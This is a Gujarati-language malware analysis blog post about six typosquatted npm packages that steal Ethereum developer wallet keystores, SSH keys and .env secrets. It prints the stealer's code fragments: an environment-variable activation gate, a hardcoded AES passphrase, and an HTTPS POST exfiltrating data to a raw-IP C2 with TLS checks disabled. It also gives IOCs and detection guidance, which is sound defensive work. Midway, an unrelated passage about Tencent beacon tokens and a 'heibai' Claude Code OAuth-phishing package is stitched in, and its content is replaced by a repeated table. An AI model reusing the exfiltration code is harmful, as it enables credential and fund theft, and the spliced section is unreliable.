EVMDeFi npm ટાઇપોસ્કેટિંગ એટેક ડેવલપર કી ચોરી કરે છે

EVM/DeFi npm ટાઇપોસ્કેટિંગ એટેક ડેવલપર કી ચોરી કરે છે

TL; DR

૬ મે, ૨૦૨૬ ના રોજ, એક જ npm પ્રકાશક, namikazesarada010206, એથેરિયમ, સોલિડિટી અને ડેફાઇ ડેવલપર ઇકોસિસ્ટમને લક્ષ્ય બનાવતા છ દૂષિત પેકેજો આગળ ધપાવ્યા.

પેકેજો, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, અને web3-utils-core, લોકપ્રિય Web3 ટૂલિંગ માટે સહાયક લાઇબ્રેરીઓ જેવા દેખાવા માટે રચાયેલ બુદ્ધિગમ્ય નામોનો ઉપયોગ કર્યો.

બધા છ પેકેજોમાં સમાન સામગ્રી હતી telemetry.js ફાઇલ. ફાઇલ સમગ્ર ક્લસ્ટરમાં બાઇટ-સમાન હતી, જેમાં SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

માલવેર ઇન્સ્ટોલેશન સમયે કાર્ય કરતું નથી. કોઈ preinstall or postinstall હૂક. તેના બદલે, જ્યારે પેકેજ આયાત કરવામાં આવે છે ત્યારે તે સક્રિય થાય છે require().

તે વિગત મહત્વપૂર્ણ છે.

ઇમ્પ્લાન્ટ ડેવલપર ખરેખર પેકેજનો ઉપયોગ કરે ત્યાં સુધી રાહ જુએ છે. પછી તે તપાસે છે કે વર્કસ્ટેશન વાસ્તવિક ઇથેરિયમ / સોલિડિટી ડેવલપમેન્ટ વાતાવરણ જેવું દેખાય છે કે નહીં. તે અલ્કેમી અથવા ઇન્ફુરા કી, ખાનગી કી, નેમોનિક્સ, ડિપ્લોયર કી અથવા સ્થાનિક ફાઉન્ડ્રી ડિરેક્ટરી શોધે છે.

જો હોસ્ટ મેળ ખાય છે, તો ચોરી કરનાર SSH ખાનગી કી, ફાઉન્ડ્રી / ગેથ / બ્રાઉની વોલેટ કીસ્ટોર્સ એકત્રિત કરે છે, .env* ફાઇલો, અને સંવેદનશીલ પર્યાવરણ ચલો. તે હાર્ડકોડેડ પાસફ્રેઝનો ઉપયોગ કરીને AES-256-GCM સાથે બંડલને એન્ક્રિપ્ટ કરે છે અને TLS ચકાસણી અક્ષમ કરીને તેને કાચા IPv4 C2 એન્ડપોઇન્ટ પર એક્સફિલ્ટ્રેટ કરે છે.

Xygeni ની માલવેર અર્લી વોર્નિંગ (MEW) સિસ્ટમે બધા છ પેકેજોને દૂષિત તરીકે પુષ્ટિ આપી છે. npm રજિસ્ટ્રી ટેકડાઉન રિપોર્ટ બંડલ બાકી છે.

ધ ક્લસ્ટર: છ પેકેજો, એક પ્રકાશક

પ્રકાશક ખાતું namikazesarada010206 ચકાસાયેલ ન હોય તેવા Gmail સરનામાં સાથે લિંક કરવામાં આવ્યું હતું namikazesarada010206@gmail.com.

આ ઝુંબેશ 6 મે, 2026 ના રોજ એક દિવસીય પ્રકાશન વિસ્ફોટ તરીકે દેખાઈ. બધા છ પેકેજોનું સંસ્કરણ આ રીતે કરવામાં આવ્યું હતું 1.0.0, શૂન્ય રનટાઇમ નિર્ભરતાઓ હતી, અને ફક્ત ત્રણ ફાઇલો મોકલવામાં આવી હતી:

package.json index.js telemetry.js

તેઓએ સમાન સ્ત્રોત ભંડાર પણ જાહેર કર્યો:

https://github.com/harunosakura030303-maker/evmchain-config

પ્રથમ ત્રણ પેકેજો પ્રથમ પ્રકાશન પર MEW સ્કેનર્સ દ્વારા પકડાયા હતા. બાકીના ત્રણ પેકેજો પ્રકાશકની npm પ્રોફાઇલની વિશ્લેષક સમીક્ષા પછી બળજબરીથી ફ્લેગ કરવામાં આવ્યા હતા. એકવાર સમાન બાઇટ-સમાન telemetry.js ક્લસ્ટરમાં પુષ્ટિ મળી હતી, પરંતુ સુસંગતતા દ્વારા તેમને દૂષિત તરીકે બંધ કરવામાં આવ્યા હતા.

પેકેજ આવૃત્તિ npm પ્રકાશિત MEW ટિકિટ ચુકાદો
વિમ-કોર 1.0.0 2026-05-06 01:38:44Z #51049 દૂષિત
viem-utils-core 1.0.0 2026-05-06 #51050 દૂષિત
હાર્ડહેટ-કોર-યુટિલ્સ 1.0.0 2026-05-06 #51051 દૂષિત
ઇવીએમ-યુટિલ્સ 1.0.0 2026-05-06 #51069 દૂષિત, સુસંગતતા દ્વારા
ફાઉન્ડ્રી-યુટિલ્સ 1.0.0 2026-05-06 #51071 દૂષિત, સુસંગતતા દ્વારા
વેબ3-યુટિલ્સ-કોર 1.0.0 2026-05-06 #51070 દૂષિત, સુસંગતતા દ્વારા

નામકરણની વ્યૂહરચના સીધી છે પણ અસરકારક છે.

આ પેકેજો ચોક્કસ અપસ્ટ્રીમ નામોનો ઢોંગ કરતા નથી. તેના બદલે, તેઓ બુદ્ધિગમ્ય "ઉપયોગિતા" પ્રત્યયનો ઉપયોગ કરે છે જેમ કે -core, -utils, અને -utils-core. આનાથી તેઓ વેબ3 ટૂલિંગની નજીક જોવાની અપેક્ષા રાખતી સાથી લાઇબ્રેરીઓ જેવા દેખાય છે.

દૂષિત પેકેજ કાયદેસર લક્ષ્ય
વિમ-કોર viem, એક લોકપ્રિય Ethereum TypeScript ક્લાયંટ
viem-utils-core વિયેમ
હાર્ડહેટ-કોર-યુટિલ્સ હાર્ડહેટ, એક મુખ્ય પ્રવાહનું સોલિડિટી વિકાસ વાતાવરણ
ઇવીએમ-યુટિલ્સ સામાન્ય EVM ટૂલિંગ નેમસ્પેસ
ફાઉન્ડ્રી-યુટિલ્સ ફાઉન્ડ્રી, એક સોલિડિટી ટૂલચેન
વેબ3-યુટિલ્સ-કોર web3-utils, Web3.js સહાયકો

આ "પૂરક પેકેજ" પેટર્ન છે: "હું વાસ્તવિક પેકેજ છું" નહીં, પરંતુ "હું વાસ્તવિક પેકેજની આસપાસ વાજબી સહાયક જેવો દેખાઉં છું."

DeFi ડેવલપર્સ ઝડપથી આગળ વધી રહ્યા છે, તે જોખમ ઊભું કરવા માટે પૂરતું છે.

જ્યારે પેકેજ આયાત કરવામાં આવે છે ત્યારે શું થાય છે

હુમલાની સાંકળ નાની, ઇરાદાપૂર્વકની અને ક્રિપ્ટો-વિકાસ વાતાવરણ પર કેન્દ્રિત છે.

કોઈ ઇન્સ્ટોલેશન હૂક નથી. તેના બદલે, દરેક પેકેજમાં એક શામેલ છે index.js જે સ્ટબ કાર્યક્ષમતા નિકાસ કરે છે અને પછી દૂષિત ટેલિમેટ્રી મોડ્યુલ લોડ કરે છે.

require('./telemetry').init();

આનો અર્થ એ કે માલવેર પહેલી વાર આયાત થતાં જ સક્રિય થઈ જાય છે.

તે હુમલાખોર માટે કાર્યકારી રીતે ઉપયોગી છે. ઘણા સ્કેનર્સ અને સેન્ડબોક્સ ઇન્સ્ટોલ-ટાઇમ વર્તણૂક પર ધ્યાન કેન્દ્રિત કરે છે. આ પેકેજ ડેવલપર, બિલ્ડ સ્ક્રિપ્ટ, ટેસ્ટ સ્યુટ અથવા રનટાઇમ પાથ દ્વારા ખરેખર ઉપયોગમાં લેવાય ત્યાં સુધી રાહ જુએ છે.

સક્રિયકરણ ગેટ: ફક્ત વાસ્તવિક વેબ3 ડેવલપર વર્કસ્ટેશન પર જ ફાયર

ઇમ્પ્લાન્ટનો સૌથી મહત્વપૂર્ણ ભાગ એક્ટિવેશન ગેટ છે.

માલવેર સામાન્ય રીતે Ethereum / Solidity ડેવલપર મશીનો પર જોવા મળતા પર્યાવરણ ચલોની તપાસ કરે છે:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

તે એ પણ તપાસે છે કે ફાઉન્ડ્રી ઇન્સ્ટોલ કરેલી દેખાય છે કે નહીં:

fs.existsSync(path.join(os.homedir(), '.foundry'))

જો બંનેમાંથી કોઈ પણ શરત સાચી ન હોય, તો ફંક્શન પાછું આવે છે અને કંઈ કરતું નથી.

તે સામાન્ય વિશ્લેષણ વાતાવરણમાં પેકેજને શાંત બનાવે છે. ફાઉન્ડ્રી, અલ્કેમી કી, ઇન્ફુરા કી, ખાનગી કી અથવા નેમોનિક્સ વિનાના સેન્ડબોક્સમાં હાનિકારક દેખાતી આયાત દેખાઈ શકે છે.

મેળ ખાતા હોસ્ટ પર, માલવેર સંગ્રહ પહેલાં 60 થી 90 સેકન્ડ રાહ જુએ છે:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

વિલંબ આયાત અને એક્સફિલ્ટ્રેશન વચ્ચેના સ્પષ્ટ સહસંબંધને ઘટાડે છે. .unref() જો પેકેજ ટૂંકા ગાળાની સ્ક્રિપ્ટમાં આયાત કરવામાં આવ્યું હોય તો કોલ હોસ્ટ પ્રક્રિયાને સામાન્ય રીતે બહાર નીકળવા દે છે.

આ કોઈ ઘોંઘાટીયા સ્મેશ-એન્ડ-ગ્રેબ વર્તન નથી. તે એક લક્ષિત ચોરી કરનાર છે જે ડેવલપર વાતાવરણ ચોરી કરવા યોગ્ય ન હોય ત્યાં સુધી દોડવાનું ટાળવા માટે રચાયેલ છે.

ચોર શું એકત્રિત કરે છે

એકવાર સક્રિયકરણ ગેટ પસાર થઈ જાય, પછી માલવેર એવા સ્ત્રોતોમાંથી એકત્રિત કરે છે જે Web3 ડેવલપમેન્ટમાં સૌથી મહત્વપૂર્ણ છે: ખાનગી કી, વોલેટ કીસ્ટોર્સ, ડિપ્લોયમેન્ટ ઓળખપત્રો, ક્લાઉડ સિક્રેટ્સ, npm ટોકન્સ અને સ્થાનિક પ્રોજેક્ટ ગોઠવણી.

સોર્સ શું એકત્રિત કરવામાં આવે છે
process.env કોઈપણ ચલ મેચિંગ /ટોકન|ગુપ્ત|કી|પાસ|અધિકૃત|ખાનગી|બીજ|મેમોનિક|AWS|NPM|ડિપ્લોય/i
~/.ssh/* સંપૂર્ણ ફાઇલ સામગ્રી સહિત, PRIVATE KEY અથવા BEGIN OPENSH ધરાવતી ફાઇલો
~/.ફાઉન્ડ્રી/કીસ્ટોર્સ/* ફાઉન્ડ્રી વોલેટ કીસ્ટોર ફાઇલો
~/.ઇથેરિયમ/કીસ્ટોર/* ગેથ વોલેટ કીસ્ટોર ફાઇલો
~/.બ્રાઉની/એકાઉન્ટ્સ/* બ્રાઉની વોલેટ કીસ્ટોર ફાઇલો
${cwd}/.env સંપૂર્ણ ફાઇલ સામગ્રી
${cwd}/.env.local સંપૂર્ણ ફાઇલ સામગ્રી
${cwd}/.env.પ્રોડક્શન સંપૂર્ણ ફાઇલ સામગ્રી
${cwd}/.env.ડેવલપમેન્ટ સંપૂર્ણ ફાઇલ સામગ્રી
ઓએસ.હોસ્ટનામ() હોસ્ટ મેટાડેટા
ક્રિપ્ટો.રેન્ડમUUID() પીડિત/સત્ર ઓળખકર્તા
તારીખ.હવે() સંગ્રહ ટાઇમસ્ટેમ્પ
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA ટોકન્સ છે:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

અમે પુષ્ટિ કરી શક્યા નથી કે ટેલિમેટ્રી ઓપરેટરનું પોતાનું એનાલિટિક્સ હતું કે અલગથી મુદ્રીકૃત ચેનલ. અમે તપાસેલા બંને નમૂનાઓમાં ATTA ટોકન્સ સમાન છે.

ક્લસ્ટર B: હેઇબાઈ

claude.hk OAuth ફિશિંગ + ANTHROPIC_BASE_URL હાઇજેક

૧ એપ્રિલનો નમૂનો આ ઝુંબેશનો સૌથી ક્રૂર, પહેલો ભાગ છે.

heibai:2.1.88-claude.hk-4 દ્વારા પ્રકાશિત કરવામાં આવી હતી wuguoqiangvip28, 7 જૂન, 2025 ના રોજ બનાવેલ એકાઉન્ટ. પેકેજ સ્પષ્ટપણે કાયદેસરની વિરુદ્ધ વર્ઝન કરે છે 2.1.88 માનવીય પ્રકાશન.

તે CA-cert MITM સાથે કોઈ વાંધો ઉઠાવતું નથી. તેના બદલે, તે OAuth એન્ડપોઇન્ટ વિશે વપરાશકર્તાને જૂઠું બોલે છે.

લીક થયેલા ક્લાઉડ કોડ સ્રોતમાં દૂષિત ઉમેરાઓ શામેલ છે:

સોર્સ શું એકત્રિત કરવામાં આવે છે
process.env કોઈપણ ચલ મેચિંગ /ટોકન|ગુપ્ત|કી|પાસ|અધિકૃત|ખાનગી|બીજ|મેમોનિક|AWS|NPM|ડિપ્લોય/i
~/.ssh/* સંપૂર્ણ ફાઇલ સામગ્રી સહિત, PRIVATE KEY અથવા BEGIN OPENSH ધરાવતી ફાઇલો
~/.ફાઉન્ડ્રી/કીસ્ટોર્સ/* ફાઉન્ડ્રી વોલેટ કીસ્ટોર ફાઇલો
~/.ઇથેરિયમ/કીસ્ટોર/* ગેથ વોલેટ કીસ્ટોર ફાઇલો
~/.બ્રાઉની/એકાઉન્ટ્સ/* બ્રાઉની વોલેટ કીસ્ટોર ફાઇલો
${cwd}/.env સંપૂર્ણ ફાઇલ સામગ્રી
${cwd}/.env.local સંપૂર્ણ ફાઇલ સામગ્રી
${cwd}/.env.પ્રોડક્શન સંપૂર્ણ ફાઇલ સામગ્રી
${cwd}/.env.ડેવલપમેન્ટ સંપૂર્ણ ફાઇલ સામગ્રી
ઓએસ.હોસ્ટનામ() હોસ્ટ મેટાડેટા
ક્રિપ્ટો.રેન્ડમUUID() પીડિત/સત્ર ઓળખકર્તા
તારીખ.હવે() સંગ્રહ ટાઇમસ્ટેમ્પ

લક્ષ્ય સૂચિ ખૂબ જ ચોક્કસ છે. આ સામાન્ય બ્રાઉઝર ચોરી અથવા વ્યાપક ઓળખપત્ર સ્ક્રેપિંગ નથી. તે એવા વિકાસકર્તાઓ માટે છે જેઓ ઇથેરિયમ એપ્લિકેશનો બનાવે છે, પરીક્ષણ કરે છે, જમાવે છે અથવા ચલાવે છે.

ફાઉન્ડ્રી, ગેથ અને બ્રાઉની કીસ્ટોર્સનો સમાવેશ ખાસ કરીને મહત્વપૂર્ણ છે. આ ફાઇલો વોલેટ્સ અથવા ડિપ્લોયમેન્ટ ઓળખની સીધી ઍક્સેસનું પ્રતિનિધિત્વ કરી શકે છે. જો હુમલાખોર તેમને પાસવર્ડ્સ, નેમોનિક્સ અથવા પર્યાવરણીય રહસ્યો સાથે જોડી શકે છે, તો તેઓ ભંડોળ ખસેડવા, ડિપ્લોયર્સનો ઢોંગ કરવા અથવા સ્માર્ટ કોન્ટ્રાક્ટ કામગીરી સાથે ચેડા કરી શકશે.

એક્સફિલ્ટ્રેશન પહેલાં એન્ક્રિપ્શન

આ માલવેર એકત્રિત કરેલા ડેટાને મોકલતા પહેલા તેને એન્ક્રિપ્ટ કરે છે.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

હાર્ડકોડેડ પાસફ્રેઝ છે:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

અંતિમ પેલોડ JSON તરીકે લપેટાયેલ છે:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

એન્ક્રિપ્શન માલવેરને વધુ અદ્યતન બનાવતું નથી. જો કે, તે નેટવર્ક નિરીક્ષણને વધુ મુશ્કેલ બનાવે છે. બહાર નીકળતા ડિફેન્ડરને JSON પેલોડ દેખાશે, પરંતુ ચોરાયેલી ચાવીઓ, વોલેટ ફાઇલો અથવા .env હાર્ડકોડેડ પાસફ્રેઝ અને ડિક્રિપ્શન લોજિક વિનાની સામગ્રી.

કાચો IPv4 C2 માં એક્સફિલ્ટ્રેશન

એક્સફિલ્ટ્રેશન પાથ હાર્ડકોડેડ છે:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

માલવેર ડેટા મોકલે છે:

https://76.13.37.80:8443/api/v1/telemetry

બે વિગતો બહાર આવે છે.

પ્રથમ, C2 એ ડોમેનને બદલે એક કાચો IPv4 સરનામું છે. તે ડોમેન નોંધણીની જરૂરિયાતને દૂર કરે છે અને કેટલાક ડોમેન-આધારિત શોધને ટાળે છે.

બીજું, TLS ચકાસણી આનાથી અક્ષમ છે:

rejectUnauthorized: false

તે માલવેરને સ્વ-સહી કરેલા પ્રમાણપત્રો સહિત કોઈપણ પ્રમાણપત્ર સ્વીકારવાની મંજૂરી આપે છે. બીજા શબ્દોમાં કહીએ તો, હુમલાખોરને માન્ય જાહેર પ્રમાણપત્રની જરૂર વગર એન્ક્રિપ્ટેડ પરિવહન મળે છે.

કોઈ રીટ્રાય લોજિક નથી અને કોઈ ફોલબેક હોસ્ટ નથી. ભૂલો શાંતિથી ગળી જાય છે. જો C2 ઑફલાઇન હોય અથવા પહોંચની બહાર હોય તો આ પેકેજને શાંત રાખે છે.

આ ઝુંબેશ શા માટે મહત્વપૂર્ણ છે

મોટાભાગના દૂષિત npm પેકેજો વિકાસકર્તાઓ માટે બનાવાયેલ છે જે વ્યાપક ઓળખપત્રોનો પીછો કરે છે: npm ટોકન્સ, AWS કી, GitHub ટોકન્સ, અથવા .npmrc ફાઈલો.

આ ઝુંબેશ લક્ષ્યને સંકુચિત કરે છે.

તે એવા સંકેતો શોધે છે કે મશીન ઇથેરિયમ અથવા સોલિડિટી ડેવલપરનું છે. પછી તે તે વાતાવરણમાં મહત્વની સંપત્તિઓને બરાબર ખેંચે છે: વોલેટ કીસ્ટોર્સ, ખાનગી કી, નેમોનિક્સ, ડિપ્લોયર કી, .env ફાઇલો, અને SSH કીઓ.

તે ઝુંબેશને Web3 ટીમો માટે સામાન્ય npm સ્ટીલર કરતાં વધુ ખતરનાક બનાવે છે.

સફળ ચેપ આનો ખુલાસો કરી શકે છે:

  • ડિપ્લોયમેન્ટ વોલેટ્સ
  • સ્માર્ટ કોન્ટ્રેક્ટ એડમિન કી
  • RPC પ્રદાતા કી
  • ક્લાઉડ ડિપ્લોયમેન્ટ ઓળખપત્રો
  • npm પ્રકાશન ટોકન્સ
  • ડેવલપર અથવા બિલ્ડ ઇન્ફ્રાસ્ટ્રક્ચર માટે SSH ઍક્સેસ
  • પ્રોજેક્ટ રહસ્યો સંગ્રહિત છે .env ફાઈલો
  • ફાઉન્ડ્રી, ગેથ અથવા બ્રાઉની માટે વોલેટ કીસ્ટોર્સ

પેકેજ નામો પણ સ્પષ્ટ સામાજિક ઇજનેરી દર્શાવે છે. તેઓ પરિચિત ટૂલ નામો દ્વારા Web3 ડેવલપર ઇકોસિસ્ટમને લક્ષ્ય બનાવે છે: viem, hardhat, foundry, evm, અને web3.

અભિનેતાને વાસ્તવિક પ્રોજેક્ટ્સ સાથે સમાધાન કરવાની જરૂર નથી. તેમને ફક્ત એક ડેવલપરની જરૂર છે જે વાજબી સાથી પેકેજ જેવું દેખાય છે તે ઇન્સ્ટોલ કરે.

સમાધાન અને શોધના સૂચકાંકો

પેકેજો અને પ્રકાશક
ક્ષેત્ર ભાવ
npm પ્રકાશક નામિકાઝેસરદા010206
પ્રકાશકનું ઇમેઇલ namikazesarada010206@gmail.com
ઇમેઇલ ચકાસાયેલ ના
SCM ચકાસણી ના
પ્રતિષ્ઠા સ્કોર 1.0
પેકેજો viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
આવૃત્તિઓ બધા 1.0.0
સ્ત્રોત ભંડાર https://github.com/harunosakura030303-maker/evmchain-config
દૂષિત હોવાની પુષ્ટિ થઈ બધા છ પેકેજો
નેટવર્ક
પ્રકાર ભાવ
C2 એન્ડપોઇન્ટ https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
C2 પોર્ટ 8443/ટીસીપી
TLS વર્તન અસ્વીકાર અનધિકૃત: ખોટું
પેલોડ સ્કીમા {"v":2,"iv": "ડી": "ટી": }
ફાઇલો અને હેશ
પ્રકાર ભાવ
ટેલિમેટ્રી.જેએસ SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
પેકેજ લેઆઉટ પેકેજ.જેસન, ઇન્ડેક્સ.જેએસ, ટેલિમેટ્રી.જેએસ
ફાઇલ ગણતરી 3
અંદાજિત કુલ કદ 3.4 KB

સક્રિયકરણ સંકેતો

માલવેર આ પર્યાવરણ ચલોની તપાસ કરે છે:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

તે આ માટે પણ તપાસે છે:

~/.foundry/

લક્ષિત હોસ્ટ પાથ

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

સંગ્રહ રેજેક્સ

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

શોધ નોંધો

સંપૂર્ણ વર્તણૂકીય વિશ્લેષણની જરૂર વગર ઘણા નિયમો આ ઝુંબેશને પકડી રાખે છે.

પ્રથમ, છ દૂષિત પેકેજ નામો માટે લોકફાઇલો સ્કેન કરો:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

કોઈપણ મેચ package-lock.json, yarn.lock, pnpm-lock.yaml, અથવા node_modules ઇતિહાસને એક ગંભીર ઘટના તરીકે ગણવો જોઈએ.

બીજું, વોલેટ કીસ્ટોર પાથ વાંચતી Node.js પ્રક્રિયાઓ માટે મોનિટર કરો:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

હેલ્પર ડિપેન્ડન્સી તરીકે આયાત કરાયેલા પેકેજ માટે આ ભાગ્યે જ કાયદેસર વર્તન છે. જ્યારે આઉટબાઉન્ડ નેટવર્ક પ્રવૃત્તિ પછી આવે છે ત્યારે તે ખાસ કરીને શંકાસ્પદ હોય છે.

ત્રીજું, HTTPS કનેક્શન પર બ્લોક કરો અથવા ચેતવણી આપો:

76.13.37.80:8443

ખાસ કરીને જ્યારે વિનંતીનો માર્ગ આ હોય:

/api/v1/telemetry

ચોથું, આ લક્ષણોને જોડતા npm પેકેજો શોધો:

  • નવા અથવા ઓછી પ્રતિષ્ઠા ધરાવતા પ્રકાશક
  • ચકાસાયેલ ન હોય તેવું Gmail એકાઉન્ટ
  • Web3-સંલગ્ન પેકેજ નામ
  • કોઈ અર્થપૂર્ણ ભંડાર ઇતિહાસ નથી
  • નાનું પેકેજ લેઆઉટ
  • index.js જે ટેલિમેટ્રી અથવા હેલ્પર ફાઇલ લોડ કરે છે
  • કોઈ રનટાઇમ નિર્ભરતા નથી
  • સંવેદનશીલ પર્યાવરણ-ચલ સંગ્રહ
  • વૉલેટ કીસ્ટોર ઍક્સેસ

આ પેટર્ન એક જ IOC કરતાં વધુ ઉપયોગી છે કારણ કે આગામી પેકેજ IP સરનામું બદલી શકે છે પરંતુ તે જ લક્ષ્યીકરણ તર્ક રાખી શકે છે.

સમાધાન પ્રતિભાવ ચેકલિસ્ટ

જો કોઈ ડેવલપરે છ પેકેજોમાંથી એકનો ઉપયોગ કર્યો હોય અને તેનું વાતાવરણ સક્રિયકરણ ગેટ સાથે મેળ ખાતું હોય, તો વર્કસ્ટેશનને ચેડા થયેલ ગણો.

તેમાં ફાઉન્ડ્રી ઇન્સ્ટોલ કરેલા મશીનો, પર્યાવરણમાં અલ્કેમી અથવા ઇન્ફુરા કી, ખાનગી કી, નેમોનિક્સ અથવા ડિપ્લોયર કીનો સમાવેશ થાય છે.

ભલામણ કરેલ પ્રતિભાવ:

  • નેટવર્કથી હોસ્ટને ડિસ્કનેક્ટ કરો.
  • સાચવો node_modules, લોકફાઇલ્સ, શેલ ઇતિહાસ અને ફોરેન્સિક્સ માટે સંબંધિત લોગ.
  • દરેક SSH કીપેયરને નીચે ફેરવો ~/.ssh/.
  • દરેક કીસ્ટોર માટે વોલેટ કી ફેરવો ~/.foundry, ~/.ethereum, અને ~/.brownie.
  • ભંડોળને નવા પાકીટમાં ખસેડો.
  • સંગ્રહિત દરેક રહસ્યને ફેરવો .env* ડેવલપર જે રિપોઝીટરીઓમાં કામ કરતા હતા તેમાં ફાઇલો.
  • AWS કી, npm ટોકન્સ, ડિપ્લોય ટોકન્સ, API કી, પ્રાઇવેટ કી, સીડ્સ અને નેમોનિક્સ સહિત કલેક્શન રેજેક્સ સાથે મેળ ખાતા પર્યાવરણ રહસ્યોને ફેરવો.
  • પેકેજ પહેલી વાર ઇન્સ્ટોલ થયું ત્યારથી ઓડિટ ક્લાઉડ, npm, GitHub, RPC પ્રદાતા અને બ્લોકચેન પ્રવૃત્તિ.
  • પુનઃઉપયોગ કરતા પહેલા વર્કસ્ટેશનની ફરીથી છબી બનાવો.

ડિફેન્ડર્સે શું લઈ જવું જોઈએ

આ ઝુંબેશ બતાવે છે કે ઉચ્ચ-મૂલ્યવાળા ડેવલપર ઇકોસિસ્ટમ્સની આસપાસ npm ટાઇપોસ્ક્વેટિંગ કેવી રીતે વિકસિત થઈ રહ્યું છે.

અભિનેતાને સતત પ્રયત્નોની જરૂર નહોતી. તેમને ગૂંચવણની જરૂર નહોતી. તેમને ઇન્સ્ટોલ-ટાઇમ એક્ઝિક્યુશનની પણ જરૂર નહોતી.

તેના બદલે, તેઓ ત્રણ બાબતો પર આધાર રાખતા હતા:

  • બુદ્ધિગમ્ય Web3 પેકેજ નામો
  • ફક્ત વાસ્તવિક ક્રિપ્ટો-ડેવલપમેન્ટ મશીનો પર સક્રિયકરણ
  • ઇથેરિયમ ડેવલપર્સ માટે સૌથી મહત્વપૂર્ણ ફાઇલો અને રહસ્યોની સીધી ચોરી

આના કારણે ઝુંબેશ વ્યાપક સ્કેનિંગમાં ચૂકી જવાનું સરળ બને છે અને જ્યારે તે યોગ્ય વાતાવરણમાં ઉતરે છે ત્યારે તે ખતરનાક બને છે.

Web3 ટીમો માટે, પાઠ સ્પષ્ટ છે: તમારા ધમકી મોડેલના ભાગ રૂપે નિર્ભરતા નામોનો ઉપયોગ કરો. એક પેકેજ જે હાનિકારક સહાયક જેવું લાગે છે તે હજુ પણ વોલેટ સમાધાનનો સૌથી ટૂંકો રસ્તો બની શકે છે.

npm રજિસ્ટ્રીમાં જાણ કરી. પ્રકાશક એકાઉન્ટ અને પેકેજો દૂર થયા પછી અમે આ પોસ્ટ અપડેટ કરીશું.

સ્કા-ટૂલ્સ-સોફ્ટવેર-રચના-વિશ્લેષણ-ટૂલ્સ
તમારા સોફ્ટવેર જોખમોને પ્રાથમિકતા આપો, સુધારણા કરો અને સુરક્ષિત કરો
તમારું મફત ખાતું મેળવો.
કોઈ ક્રેડિટ કાર્ડ જરૂરી નથી.

તમારા સોફ્ટવેર ડેવલપમેન્ટ અને ડિલિવરી સુરક્ષિત કરો

ઝાયજેની પ્રોડક્ટ સ્યુટ સાથે